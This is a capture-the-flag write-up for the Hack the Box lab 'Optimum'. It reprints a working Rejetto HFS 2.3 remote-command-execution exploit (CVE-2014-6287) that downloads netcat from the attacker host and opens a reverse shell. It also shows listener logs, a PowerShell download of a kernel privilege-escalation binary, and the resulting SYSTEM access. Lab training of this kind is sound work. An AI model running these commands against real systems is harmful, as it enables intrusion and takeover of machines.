Today we are going to solve another CTF challenge called “Optimum” which is categorised as retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online, therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.
C:\Users\jacco>nmap -sC -sV 10.10.10.8 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-06 20:58 W. Europe Standard Time Nmap scan report for 10.10.10.8 Host is up (0.026s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.50 seconds
https://www.exploit-db.com/exploits/39161/
Usage is : python exploit.py RHOST RPORT
root@kali:~/htb/optimum# cat rejetto-exploit.py #!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "10.10.14.20" #local IP address local_port = "443" # Local Port number vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script""" root@kali:~/htb/optimum#
We need to host netcat (http://attackers_ip:80/nc.exe) using a web server. and make sure we have changed the local IP and port inside the script and run:
root@kali:~/htb/optimum# python rejetto.py 10.10.10.8 80
root@kali:~/htb/optimum# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.8 - - [09/Apr/2019 09:48:39] "GET /nc.exe HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 443 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.10.10.8. Ncat: Connection from 10.10.10.8:49530. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D0BC-0196 Directory of C:\Users\kostas\Desktop 15/04/2019 02:26 <DIR> . 15/04/2019 02:26 <DIR> .. 15/04/2019 03:34 <DIR> %TEMP% 18/03/2017 03:11 760.320 hfs.exe 18/03/2017 03:13 32 user.txt.txt 2 File(s) 760.352 bytes 3 Dir(s) 31.890.731.008 bytes free C:\Users\kostas\Desktop>type user.txt.txt type user.txt.txt d0c*****f73
root@kali:/opt/Windows-Exploit-Suggester# apt-get install python-xlrd Reading package lists... Done root@kali:/opt/Windows-Exploit-Suggester# ./windows-exploit-suggester.py -d 2019-05-20-mssb.xls -i systeminfooptimum.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (utf-8) [*] querying database file for potential vulnerabilities [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits [*] there are now 246 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 2012 R2 64-bit' [*] [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] --snip-- [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical [*] done
Privesc
C:\Users\kostas\Desktop>powershell -c "Invoke-WebRequest -Uri http://10.10.14.20/ms16-098.exe -OutFile C:\Users\kostas\Desktop\puck.exe" powershell -c "Invoke-WebRequest -Uri http://10.10.14.15/41020.exe -OutFile C:\Users\kostas\Desktop\puck.exe" C:\Users\kostas\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is D0BC-0196 Directory of C:\Users\kostas\Desktop 13/02/2019 06:43 ºú <DIR> . 13/02/2019 06:43 ºú <DIR> .. 13/02/2019 01:56 ºú <DIR> %TEMP% 18/03/2017 02:11 úú 760.320 hfs.exe 13/02/2019 06:44 ºú 560.128 puck.exe 18/03/2017 02:13 úú 32 user.txt.txt 6 File(s) 2.029.687 bytes 3 Dir(s) 31.859.699.712 bytes free C:\Users\kostas\Desktop>puck.exe puck.exe Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami nt authority\system C:\Users\kostas\Desktop>type c:\users\administrator\desktop\root.txt type c:\users\administrator\desktop\root.txt 51e*****eed
Author: Puckiestyle